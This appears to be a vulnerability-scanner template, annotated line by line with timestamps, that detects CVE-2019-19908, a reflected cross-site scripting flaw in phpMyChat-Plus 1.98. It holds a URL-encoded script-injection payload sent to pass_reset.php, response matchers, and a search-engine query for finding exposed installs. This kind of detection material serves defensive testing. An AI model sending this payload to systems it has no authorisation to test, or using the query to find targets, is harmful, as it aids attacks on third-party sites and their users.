2021-01-02 04:59:06 +00:00
id : CVE-2019-19908
2020-04-08 13:04:46 +00:00
info :
2022-09-08 13:28:46 +00:00
name : phpMyChat-Plus 1.98 - Cross-Site Scripting
2020-04-08 13:04:46 +00:00
author : madrobot
2020-05-25 07:49:06 +00:00
severity : medium
2022-10-26 07:02:34 +00:00
description : |
phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:53:28 +00:00
remediation : |
Upgrade to a patched version of phpMyChat-Plus or apply the necessary security patches to mitigate the XSS vulnerability.
2022-04-22 10:38:41 +00:00
reference :
- https://cinzinga.github.io/CVE-2019-19908/
2022-05-17 09:18:12 +00:00
- http://ciprianmp.com/
- https://sourceforge.net/projects/phpmychat/
2022-09-08 13:28:46 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-19908
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-19908
cwe-id : CWE-79
2023-10-25 06:44:12 +00:00
epss-score : 0.00673
2024-01-14 13:49:27 +00:00
epss-percentile : 0.77654
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:a:ciprianmp:phpmychat-plus:1.98:*:*:*:*:*:*:*
2022-10-26 07:02:34 +00:00
metadata :
verified : true
2023-09-06 12:53:28 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : ciprianmp
product : phpmychat-plus
2023-09-06 12:53:28 +00:00
google-query : inurl:"/plus/pass_reset.php"
2024-01-14 09:21:50 +00:00
tags : cve2019,cve,phpMyChat,xss,ciprianmp
2020-04-08 13:04:46 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-04-08 13:04:46 +00:00
- method : GET
path :
2022-10-26 07:02:34 +00:00
- "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C"
2020-07-08 11:38:57 +00:00
matchers-condition : and
2020-04-08 13:04:46 +00:00
matchers :
2022-10-26 07:02:34 +00:00
- type : word
part : body
words :
- 'username = "</script><script>alert(document.domain)</script>'
- type : word
part : header
words :
- text/html
2020-04-08 13:04:46 +00:00
- type : status
status :
2020-05-25 07:49:06 +00:00
- 200
2024-01-26 08:31:11 +00:00
# digest: 4a0a0047304502207eb03d8c2e6a0f9dd98920f2e035025f5b8415da6d43a396202dc8c278c3c8f202210081de5c2ea89c5cbebbe3c4c350e27fc3acd88a59d2419c39f26b5530f8a4d018:922c64590222798bb761d5b6d8e72950